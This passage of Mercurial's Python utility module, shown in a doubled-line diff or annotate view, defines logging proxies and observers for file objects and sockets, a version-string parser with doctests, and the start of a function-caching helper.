576 return object.__getattribute__(self, r'_observedcall')(
577 r'close', *args, **kwargs)
577 r'close', *args, **kwargs)
578
578
579 def fileno(self, *args, **kwargs):
579 def fileno(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
581 r'fileno', *args, **kwargs)
581 r'fileno', *args, **kwargs)
582
582
583 def flush(self, *args, **kwargs):
583 def flush(self, *args, **kwargs):
584 return object.__getattribute__(self, r'_observedcall')(
584 return object.__getattribute__(self, r'_observedcall')(
585 r'flush', *args, **kwargs)
585 r'flush', *args, **kwargs)
586
586
587 def isatty(self, *args, **kwargs):
587 def isatty(self, *args, **kwargs):
588 return object.__getattribute__(self, r'_observedcall')(
588 return object.__getattribute__(self, r'_observedcall')(
589 r'isatty', *args, **kwargs)
589 r'isatty', *args, **kwargs)
590
590
591 def readable(self, *args, **kwargs):
591 def readable(self, *args, **kwargs):
592 return object.__getattribute__(self, r'_observedcall')(
592 return object.__getattribute__(self, r'_observedcall')(
593 r'readable', *args, **kwargs)
593 r'readable', *args, **kwargs)
594
594
595 def readline(self, *args, **kwargs):
595 def readline(self, *args, **kwargs):
596 return object.__getattribute__(self, r'_observedcall')(
596 return object.__getattribute__(self, r'_observedcall')(
597 r'readline', *args, **kwargs)
597 r'readline', *args, **kwargs)
598
598
599 def readlines(self, *args, **kwargs):
599 def readlines(self, *args, **kwargs):
600 return object.__getattribute__(self, r'_observedcall')(
600 return object.__getattribute__(self, r'_observedcall')(
601 r'readlines', *args, **kwargs)
601 r'readlines', *args, **kwargs)
602
602
603 def seek(self, *args, **kwargs):
603 def seek(self, *args, **kwargs):
604 return object.__getattribute__(self, r'_observedcall')(
604 return object.__getattribute__(self, r'_observedcall')(
605 r'seek', *args, **kwargs)
605 r'seek', *args, **kwargs)
606
606
607 def seekable(self, *args, **kwargs):
607 def seekable(self, *args, **kwargs):
608 return object.__getattribute__(self, r'_observedcall')(
608 return object.__getattribute__(self, r'_observedcall')(
609 r'seekable', *args, **kwargs)
609 r'seekable', *args, **kwargs)
610
610
611 def tell(self, *args, **kwargs):
611 def tell(self, *args, **kwargs):
612 return object.__getattribute__(self, r'_observedcall')(
612 return object.__getattribute__(self, r'_observedcall')(
613 r'tell', *args, **kwargs)
613 r'tell', *args, **kwargs)
614
614
615 def truncate(self, *args, **kwargs):
615 def truncate(self, *args, **kwargs):
616 return object.__getattribute__(self, r'_observedcall')(
616 return object.__getattribute__(self, r'_observedcall')(
617 r'truncate', *args, **kwargs)
617 r'truncate', *args, **kwargs)
618
618
619 def writable(self, *args, **kwargs):
619 def writable(self, *args, **kwargs):
620 return object.__getattribute__(self, r'_observedcall')(
620 return object.__getattribute__(self, r'_observedcall')(
621 r'writable', *args, **kwargs)
621 r'writable', *args, **kwargs)
622
622
623 def writelines(self, *args, **kwargs):
623 def writelines(self, *args, **kwargs):
624 return object.__getattribute__(self, r'_observedcall')(
624 return object.__getattribute__(self, r'_observedcall')(
625 r'writelines', *args, **kwargs)
625 r'writelines', *args, **kwargs)
626
626
627 def read(self, *args, **kwargs):
627 def read(self, *args, **kwargs):
628 return object.__getattribute__(self, r'_observedcall')(
628 return object.__getattribute__(self, r'_observedcall')(
629 r'read', *args, **kwargs)
629 r'read', *args, **kwargs)
630
630
631 def readall(self, *args, **kwargs):
631 def readall(self, *args, **kwargs):
632 return object.__getattribute__(self, r'_observedcall')(
632 return object.__getattribute__(self, r'_observedcall')(
633 r'readall', *args, **kwargs)
633 r'readall', *args, **kwargs)
634
634
635 def readinto(self, *args, **kwargs):
635 def readinto(self, *args, **kwargs):
636 return object.__getattribute__(self, r'_observedcall')(
636 return object.__getattribute__(self, r'_observedcall')(
637 r'readinto', *args, **kwargs)
637 r'readinto', *args, **kwargs)
638
638
639 def write(self, *args, **kwargs):
639 def write(self, *args, **kwargs):
640 return object.__getattribute__(self, r'_observedcall')(
640 return object.__getattribute__(self, r'_observedcall')(
641 r'write', *args, **kwargs)
641 r'write', *args, **kwargs)
642
642
643 def detach(self, *args, **kwargs):
643 def detach(self, *args, **kwargs):
644 return object.__getattribute__(self, r'_observedcall')(
644 return object.__getattribute__(self, r'_observedcall')(
645 r'detach', *args, **kwargs)
645 r'detach', *args, **kwargs)
646
646
647 def read1(self, *args, **kwargs):
647 def read1(self, *args, **kwargs):
648 return object.__getattribute__(self, r'_observedcall')(
648 return object.__getattribute__(self, r'_observedcall')(
649 r'read1', *args, **kwargs)
649 r'read1', *args, **kwargs)
650
650
651 class observedbufferedinputpipe(bufferedinputpipe):
651 class observedbufferedinputpipe(bufferedinputpipe):
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
653
653
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
655 bypass ``fileobjectproxy``. Because of this, we need to make
655 bypass ``fileobjectproxy``. Because of this, we need to make
656 ``bufferedinputpipe`` aware of these operations.
656 ``bufferedinputpipe`` aware of these operations.
657
657
658 This variation of ``bufferedinputpipe`` can notify observers about
658 This variation of ``bufferedinputpipe`` can notify observers about
659 ``os.read()`` events. It also re-publishes other events, such as
659 ``os.read()`` events. It also re-publishes other events, such as
660 ``read()`` and ``readline()``.
660 ``read()`` and ``readline()``.
661 """
661 """
662 def _fillbuffer(self):
662 def _fillbuffer(self):
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
664
664
665 fn = getattr(self._input._observer, r'osread', None)
665 fn = getattr(self._input._observer, r'osread', None)
666 if fn:
666 if fn:
667 fn(res, _chunksize)
667 fn(res, _chunksize)
668
668
669 return res
669 return res
670
670
671 # We use different observer methods because the operation isn't
671 # We use different observer methods because the operation isn't
672 # performed on the actual file object but on us.
672 # performed on the actual file object but on us.
673 def read(self, size):
673 def read(self, size):
674 res = super(observedbufferedinputpipe, self).read(size)
674 res = super(observedbufferedinputpipe, self).read(size)
675
675
676 fn = getattr(self._input._observer, r'bufferedread', None)
676 fn = getattr(self._input._observer, r'bufferedread', None)
677 if fn:
677 if fn:
678 fn(res, size)
678 fn(res, size)
679
679
680 return res
680 return res
681
681
682 def readline(self, *args, **kwargs):
682 def readline(self, *args, **kwargs):
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
684
684
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
686 if fn:
686 if fn:
687 fn(res)
687 fn(res)
688
688
689 return res
689 return res
690
690
691 PROXIED_SOCKET_METHODS = {
691 PROXIED_SOCKET_METHODS = {
692 r'makefile',
692 r'makefile',
693 r'recv',
693 r'recv',
694 r'recvfrom',
694 r'recvfrom',
695 r'recvfrom_into',
695 r'recvfrom_into',
696 r'recv_into',
696 r'recv_into',
697 r'send',
697 r'send',
698 r'sendall',
698 r'sendall',
699 r'sendto',
699 r'sendto',
700 r'setblocking',
700 r'setblocking',
701 r'settimeout',
701 r'settimeout',
702 r'gettimeout',
702 r'gettimeout',
703 r'setsockopt',
703 r'setsockopt',
704 }
704 }
705
705
706 class socketproxy(object):
706 class socketproxy(object):
707 """A proxy around a socket that tells a watcher when events occur.
707 """A proxy around a socket that tells a watcher when events occur.
708
708
709 This is like ``fileobjectproxy`` except for sockets.
709 This is like ``fileobjectproxy`` except for sockets.
710
710
711 This type is intended to only be used for testing purposes. Think hard
711 This type is intended to only be used for testing purposes. Think hard
712 before using it in important code.
712 before using it in important code.
713 """
713 """
714 __slots__ = (
714 __slots__ = (
715 r'_orig',
715 r'_orig',
716 r'_observer',
716 r'_observer',
717 )
717 )
718
718
719 def __init__(self, sock, observer):
719 def __init__(self, sock, observer):
720 object.__setattr__(self, r'_orig', sock)
720 object.__setattr__(self, r'_orig', sock)
721 object.__setattr__(self, r'_observer', observer)
721 object.__setattr__(self, r'_observer', observer)
722
722
723 def __getattribute__(self, name):
723 def __getattribute__(self, name):
724 if name in PROXIED_SOCKET_METHODS:
724 if name in PROXIED_SOCKET_METHODS:
725 return object.__getattribute__(self, name)
725 return object.__getattribute__(self, name)
726
726
727 return getattr(object.__getattribute__(self, r'_orig'), name)
727 return getattr(object.__getattribute__(self, r'_orig'), name)
728
728
729 def __delattr__(self, name):
729 def __delattr__(self, name):
730 return delattr(object.__getattribute__(self, r'_orig'), name)
730 return delattr(object.__getattribute__(self, r'_orig'), name)
731
731
732 def __setattr__(self, name, value):
732 def __setattr__(self, name, value):
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
734
734
735 def __nonzero__(self):
735 def __nonzero__(self):
736 return bool(object.__getattribute__(self, r'_orig'))
736 return bool(object.__getattribute__(self, r'_orig'))
737
737
738 __bool__ = __nonzero__
738 __bool__ = __nonzero__
739
739
740 def _observedcall(self, name, *args, **kwargs):
740 def _observedcall(self, name, *args, **kwargs):
741 # Call the original object.
741 # Call the original object.
742 orig = object.__getattribute__(self, r'_orig')
742 orig = object.__getattribute__(self, r'_orig')
743 res = getattr(orig, name)(*args, **kwargs)
743 res = getattr(orig, name)(*args, **kwargs)
744
744
745 # Call a method on the observer of the same name with arguments
745 # Call a method on the observer of the same name with arguments
746 # so it can react, log, etc.
746 # so it can react, log, etc.
747 observer = object.__getattribute__(self, r'_observer')
747 observer = object.__getattribute__(self, r'_observer')
748 fn = getattr(observer, name, None)
748 fn = getattr(observer, name, None)
749 if fn:
749 if fn:
750 fn(res, *args, **kwargs)
750 fn(res, *args, **kwargs)
751
751
752 return res
752 return res
753
753
754 def makefile(self, *args, **kwargs):
754 def makefile(self, *args, **kwargs):
755 res = object.__getattribute__(self, r'_observedcall')(
755 res = object.__getattribute__(self, r'_observedcall')(
756 r'makefile', *args, **kwargs)
756 r'makefile', *args, **kwargs)
757
757
758 # The file object may be used for I/O. So we turn it into a
758 # The file object may be used for I/O. So we turn it into a
759 # proxy using our observer.
759 # proxy using our observer.
760 observer = object.__getattribute__(self, r'_observer')
760 observer = object.__getattribute__(self, r'_observer')
761 return makeloggingfileobject(observer.fh, res, observer.name,
761 return makeloggingfileobject(observer.fh, res, observer.name,
762 reads=observer.reads,
762 reads=observer.reads,
763 writes=observer.writes,
763 writes=observer.writes,
764 logdata=observer.logdata,
764 logdata=observer.logdata,
765 logdataapis=observer.logdataapis)
765 logdataapis=observer.logdataapis)
766
766
767 def recv(self, *args, **kwargs):
767 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
768 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
769 r'recv', *args, **kwargs)
770
770
771 def recvfrom(self, *args, **kwargs):
771 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
772 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
773 r'recvfrom', *args, **kwargs)
774
774
775 def recvfrom_into(self, *args, **kwargs):
775 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
776 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
777 r'recvfrom_into', *args, **kwargs)
778
778
779 def recv_into(self, *args, **kwargs):
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
780 return object.__getattribute__(self, r'_observedcall')(
781 r'recv_info', *args, **kwargs)
781 r'recv_info', *args, **kwargs)
782
782
783 def send(self, *args, **kwargs):
783 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
784 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
785 r'send', *args, **kwargs)
786
786
787 def sendall(self, *args, **kwargs):
787 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
788 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
789 r'sendall', *args, **kwargs)
790
790
791 def sendto(self, *args, **kwargs):
791 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
792 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
793 r'sendto', *args, **kwargs)
794
794
795 def setblocking(self, *args, **kwargs):
795 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
796 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
797 r'setblocking', *args, **kwargs)
798
798
799 def settimeout(self, *args, **kwargs):
799 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
800 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
801 r'settimeout', *args, **kwargs)
802
802
803 def gettimeout(self, *args, **kwargs):
803 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
804 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
805 r'gettimeout', *args, **kwargs)
806
806
807 def setsockopt(self, *args, **kwargs):
807 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
808 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
809 r'setsockopt', *args, **kwargs)
810
810
811 class baseproxyobserver(object):
811 class baseproxyobserver(object):
812 def _writedata(self, data):
812 def _writedata(self, data):
813 if not self.logdata:
813 if not self.logdata:
814 if self.logdataapis:
814 if self.logdataapis:
815 self.fh.write('\n')
815 self.fh.write('\n')
816 self.fh.flush()
816 self.fh.flush()
817 return
817 return
818
818
819 # Simple case writes all data on a single line.
819 # Simple case writes all data on a single line.
820 if b'\n' not in data:
820 if b'\n' not in data:
821 if self.logdataapis:
821 if self.logdataapis:
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
823 else:
823 else:
824 self.fh.write('%s> %s\n'
824 self.fh.write('%s> %s\n'
825 % (self.name, stringutil.escapedata(data)))
825 % (self.name, stringutil.escapedata(data)))
826 self.fh.flush()
826 self.fh.flush()
827 return
827 return
828
828
829 # Data with newlines is written to multiple lines.
829 # Data with newlines is written to multiple lines.
830 if self.logdataapis:
830 if self.logdataapis:
831 self.fh.write(':\n')
831 self.fh.write(':\n')
832
832
833 lines = data.splitlines(True)
833 lines = data.splitlines(True)
834 for line in lines:
834 for line in lines:
835 self.fh.write('%s> %s\n'
835 self.fh.write('%s> %s\n'
836 % (self.name, stringutil.escapedata(line)))
836 % (self.name, stringutil.escapedata(line)))
837 self.fh.flush()
837 self.fh.flush()
838
838
839 class fileobjectobserver(baseproxyobserver):
839 class fileobjectobserver(baseproxyobserver):
840 """Logs file object activity."""
840 """Logs file object activity."""
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
842 logdataapis=True):
842 logdataapis=True):
843 self.fh = fh
843 self.fh = fh
844 self.name = name
844 self.name = name
845 self.logdata = logdata
845 self.logdata = logdata
846 self.logdataapis = logdataapis
846 self.logdataapis = logdataapis
847 self.reads = reads
847 self.reads = reads
848 self.writes = writes
848 self.writes = writes
849
849
850 def read(self, res, size=-1):
850 def read(self, res, size=-1):
851 if not self.reads:
851 if not self.reads:
852 return
852 return
853 # Python 3 can return None from reads at EOF instead of empty strings.
853 # Python 3 can return None from reads at EOF instead of empty strings.
854 if res is None:
854 if res is None:
855 res = ''
855 res = ''
856
856
857 if self.logdataapis:
857 if self.logdataapis:
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
859
859
860 self._writedata(res)
860 self._writedata(res)
861
861
862 def readline(self, res, limit=-1):
862 def readline(self, res, limit=-1):
863 if not self.reads:
863 if not self.reads:
864 return
864 return
865
865
866 if self.logdataapis:
866 if self.logdataapis:
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
868
868
869 self._writedata(res)
869 self._writedata(res)
870
870
871 def readinto(self, res, dest):
871 def readinto(self, res, dest):
872 if not self.reads:
872 if not self.reads:
873 return
873 return
874
874
875 if self.logdataapis:
875 if self.logdataapis:
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
877 res))
877 res))
878
878
879 data = dest[0:res] if res is not None else b''
879 data = dest[0:res] if res is not None else b''
880 self._writedata(data)
880 self._writedata(data)
881
881
882 def write(self, res, data):
882 def write(self, res, data):
883 if not self.writes:
883 if not self.writes:
884 return
884 return
885
885
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 # returns the integer bytes written.
887 # returns the integer bytes written.
888 if res is None and data:
888 if res is None and data:
889 res = len(data)
889 res = len(data)
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
893
893
894 self._writedata(data)
894 self._writedata(data)
895
895
896 def flush(self, res):
896 def flush(self, res):
897 if not self.writes:
897 if not self.writes:
898 return
898 return
899
899
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
901
901
902 # For observedbufferedinputpipe.
902 # For observedbufferedinputpipe.
903 def bufferedread(self, res, size):
903 def bufferedread(self, res, size):
904 if not self.reads:
904 if not self.reads:
905 return
905 return
906
906
907 if self.logdataapis:
907 if self.logdataapis:
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
909 self.name, size, len(res)))
909 self.name, size, len(res)))
910
910
911 self._writedata(res)
911 self._writedata(res)
912
912
913 def bufferedreadline(self, res):
913 def bufferedreadline(self, res):
914 if not self.reads:
914 if not self.reads:
915 return
915 return
916
916
917 if self.logdataapis:
917 if self.logdataapis:
918 self.fh.write('%s> bufferedreadline() -> %d' % (
918 self.fh.write('%s> bufferedreadline() -> %d' % (
919 self.name, len(res)))
919 self.name, len(res)))
920
920
921 self._writedata(res)
921 self._writedata(res)
922
922
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
924 logdata=False, logdataapis=True):
924 logdata=False, logdataapis=True):
925 """Turn a file object into a logging file object."""
925 """Turn a file object into a logging file object."""
926
926
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
928 logdata=logdata, logdataapis=logdataapis)
928 logdata=logdata, logdataapis=logdataapis)
929 return fileobjectproxy(fh, observer)
929 return fileobjectproxy(fh, observer)
930
930
931 class socketobserver(baseproxyobserver):
931 class socketobserver(baseproxyobserver):
932 """Logs socket activity."""
932 """Logs socket activity."""
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
934 logdata=False, logdataapis=True):
934 logdata=False, logdataapis=True):
935 self.fh = fh
935 self.fh = fh
936 self.name = name
936 self.name = name
937 self.reads = reads
937 self.reads = reads
938 self.writes = writes
938 self.writes = writes
939 self.states = states
939 self.states = states
940 self.logdata = logdata
940 self.logdata = logdata
941 self.logdataapis = logdataapis
941 self.logdataapis = logdataapis
942
942
943 def makefile(self, res, mode=None, bufsize=None):
943 def makefile(self, res, mode=None, bufsize=None):
944 if not self.states:
944 if not self.states:
945 return
945 return
946
946
947 self.fh.write('%s> makefile(%r, %r)\n' % (
947 self.fh.write('%s> makefile(%r, %r)\n' % (
948 self.name, mode, bufsize))
948 self.name, mode, bufsize))
949
949
950 def recv(self, res, size, flags=0):
950 def recv(self, res, size, flags=0):
951 if not self.reads:
951 if not self.reads:
952 return
952 return
953
953
954 if self.logdataapis:
954 if self.logdataapis:
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
956 self.name, size, flags, len(res)))
956 self.name, size, flags, len(res)))
957 self._writedata(res)
957 self._writedata(res)
958
958
959 def recvfrom(self, res, size, flags=0):
959 def recvfrom(self, res, size, flags=0):
960 if not self.reads:
960 if not self.reads:
961 return
961 return
962
962
963 if self.logdataapis:
963 if self.logdataapis:
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
965 self.name, size, flags, len(res[0])))
965 self.name, size, flags, len(res[0])))
966
966
967 self._writedata(res[0])
967 self._writedata(res[0])
968
968
969 def recvfrom_into(self, res, buf, size, flags=0):
969 def recvfrom_into(self, res, buf, size, flags=0):
970 if not self.reads:
970 if not self.reads:
971 return
971 return
972
972
973 if self.logdataapis:
973 if self.logdataapis:
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
975 self.name, size, flags, res[0]))
975 self.name, size, flags, res[0]))
976
976
977 self._writedata(buf[0:res[0]])
977 self._writedata(buf[0:res[0]])
978
978
979 def recv_into(self, res, buf, size=0, flags=0):
979 def recv_into(self, res, buf, size=0, flags=0):
980 if not self.reads:
980 if not self.reads:
981 return
981 return
982
982
983 if self.logdataapis:
983 if self.logdataapis:
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
985 self.name, size, flags, res))
985 self.name, size, flags, res))
986
986
987 self._writedata(buf[0:res])
987 self._writedata(buf[0:res])
988
988
989 def send(self, res, data, flags=0):
989 def send(self, res, data, flags=0):
990 if not self.writes:
990 if not self.writes:
991 return
991 return
992
992
993 self.fh.write('%s> send(%d, %d) -> %d' % (
993 self.fh.write('%s> send(%d, %d) -> %d' % (
994 self.name, len(data), flags, len(res)))
994 self.name, len(data), flags, len(res)))
995 self._writedata(data)
995 self._writedata(data)
996
996
997 def sendall(self, res, data, flags=0):
997 def sendall(self, res, data, flags=0):
998 if not self.writes:
998 if not self.writes:
999 return
999 return
1000
1000
1001 if self.logdataapis:
1001 if self.logdataapis:
1002 # Returns None on success. So don't bother reporting return value.
1002 # Returns None on success. So don't bother reporting return value.
1003 self.fh.write('%s> sendall(%d, %d)' % (
1003 self.fh.write('%s> sendall(%d, %d)' % (
1004 self.name, len(data), flags))
1004 self.name, len(data), flags))
1005
1005
1006 self._writedata(data)
1006 self._writedata(data)
1007
1007
1008 def sendto(self, res, data, flagsoraddress, address=None):
1008 def sendto(self, res, data, flagsoraddress, address=None):
1009 if not self.writes:
1009 if not self.writes:
1010 return
1010 return
1011
1011
1012 if address:
1012 if address:
1013 flags = flagsoraddress
1013 flags = flagsoraddress
1014 else:
1014 else:
1015 flags = 0
1015 flags = 0
1016
1016
1017 if self.logdataapis:
1017 if self.logdataapis:
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1019 self.name, len(data), flags, address, res))
1019 self.name, len(data), flags, address, res))
1020
1020
1021 self._writedata(data)
1021 self._writedata(data)
1022
1022
1023 def setblocking(self, res, flag):
1023 def setblocking(self, res, flag):
1024 if not self.states:
1024 if not self.states:
1025 return
1025 return
1026
1026
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1028
1028
1029 def settimeout(self, res, value):
1029 def settimeout(self, res, value):
1030 if not self.states:
1030 if not self.states:
1031 return
1031 return
1032
1032
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1034
1034
1035 def gettimeout(self, res):
1035 def gettimeout(self, res):
1036 if not self.states:
1036 if not self.states:
1037 return
1037 return
1038
1038
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1040
1040
1041 def setsockopt(self, level, optname, value):
1041 def setsockopt(self, level, optname, value):
1042 if not self.states:
1042 if not self.states:
1043 return
1043 return
1044
1044
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1046 self.name, level, optname, value))
1046 self.name, level, optname, value))
1047
1047
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1049 logdata=False, logdataapis=True):
1049 logdata=False, logdataapis=True):
1050 """Turn a socket into a logging socket."""
1050 """Turn a socket into a logging socket."""
1051
1051
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1053 states=states, logdata=logdata,
1053 states=states, logdata=logdata,
1054 logdataapis=logdataapis)
1054 logdataapis=logdataapis)
1055 return socketproxy(fh, observer)
1055 return socketproxy(fh, observer)
1056
1056
1057 def version():
1057 def version():
1058 """Return version information if available."""
1058 """Return version information if available."""
1059 try:
1059 try:
1060 from . import __version__
1060 from . import __version__
1061 return __version__.version
1061 return __version__.version
1062 except ImportError:
1062 except ImportError:
1063 return 'unknown'
1063 return 'unknown'
1064
1064
1065 def versiontuple(v=None, n=4):
1065 def versiontuple(v=None, n=4):
1066 """Parses a Mercurial version string into an N-tuple.
1066 """Parses a Mercurial version string into an N-tuple.
1067
1067
1068 The version string to be parsed is specified with the ``v`` argument.
1068 The version string to be parsed is specified with the ``v`` argument.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1070
1070
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1072 returned values:
1072 returned values:
1073
1073
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1075 >>> versiontuple(v, 2)
1075 >>> versiontuple(v, 2)
1076 (3, 6)
1076 (3, 6)
1077 >>> versiontuple(v, 3)
1077 >>> versiontuple(v, 3)
1078 (3, 6, 1)
1078 (3, 6, 1)
1079 >>> versiontuple(v, 4)
1079 >>> versiontuple(v, 4)
1080 (3, 6, 1, '190-df9b73d2d444')
1080 (3, 6, 1, '190-df9b73d2d444')
1081
1081
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1084
1084
1085 >>> v = b'3.6'
1085 >>> v = b'3.6'
1086 >>> versiontuple(v, 2)
1086 >>> versiontuple(v, 2)
1087 (3, 6)
1087 (3, 6)
1088 >>> versiontuple(v, 3)
1088 >>> versiontuple(v, 3)
1089 (3, 6, None)
1089 (3, 6, None)
1090 >>> versiontuple(v, 4)
1090 >>> versiontuple(v, 4)
1091 (3, 6, None, None)
1091 (3, 6, None, None)
1092
1092
1093 >>> v = b'3.9-rc'
1093 >>> v = b'3.9-rc'
1094 >>> versiontuple(v, 2)
1094 >>> versiontuple(v, 2)
1095 (3, 9)
1095 (3, 9)
1096 >>> versiontuple(v, 3)
1096 >>> versiontuple(v, 3)
1097 (3, 9, None)
1097 (3, 9, None)
1098 >>> versiontuple(v, 4)
1098 >>> versiontuple(v, 4)
1099 (3, 9, None, 'rc')
1099 (3, 9, None, 'rc')
1100
1100
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1102 >>> versiontuple(v, 2)
1102 >>> versiontuple(v, 2)
1103 (3, 9)
1103 (3, 9)
1104 >>> versiontuple(v, 3)
1104 >>> versiontuple(v, 3)
1105 (3, 9, None)
1105 (3, 9, None)
1106 >>> versiontuple(v, 4)
1106 >>> versiontuple(v, 4)
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1108 """
1108 """
1109 if not v:
1109 if not v:
1110 v = version()
1110 v = version()
1111 parts = remod.split('[\+-]', v, 1)
1111 parts = remod.split('[\+-]', v, 1)
1112 if len(parts) == 1:
1112 if len(parts) == 1:
1113 vparts, extra = parts[0], None
1113 vparts, extra = parts[0], None
1114 else:
1114 else:
1115 vparts, extra = parts
1115 vparts, extra = parts
1116
1116
1117 vints = []
1117 vints = []
1118 for i in vparts.split('.'):
1118 for i in vparts.split('.'):
1119 try:
1119 try:
1120 vints.append(int(i))
1120 vints.append(int(i))
1121 except ValueError:
1121 except ValueError:
1122 break
1122 break
1123 # (3, 6) -> (3, 6, None)
1123 # (3, 6) -> (3, 6, None)
1124 while len(vints) < 3:
1124 while len(vints) < 3:
1125 vints.append(None)
1125 vints.append(None)
1126
1126
1127 if n == 2:
1127 if n == 2:
1128 return (vints[0], vints[1])
1128 return (vints[0], vints[1])
1129 if n == 3:
1129 if n == 3:
1130 return (vints[0], vints[1], vints[2])
1130 return (vints[0], vints[1], vints[2])
1131 if n == 4:
1131 if n == 4:
1132 return (vints[0], vints[1], vints[2], extra)
1132 return (vints[0], vints[1], vints[2], extra)
1133
1133
1134 def cachefunc(func):
1134 def cachefunc(func):
1135 '''cache the result of function calls'''
1135 '''cache the result of function calls'''
1136 # XXX doesn't handle keywords args
1136 # XXX doesn't handle keywords args
1137 if func.__code__.co_argcount == 0:
1137 if func.__code__.co_argcount == 0:
1138 cache = []
1138 cache = []
1139 def f():
1139 def f():
1140 if len(cache) == 0:
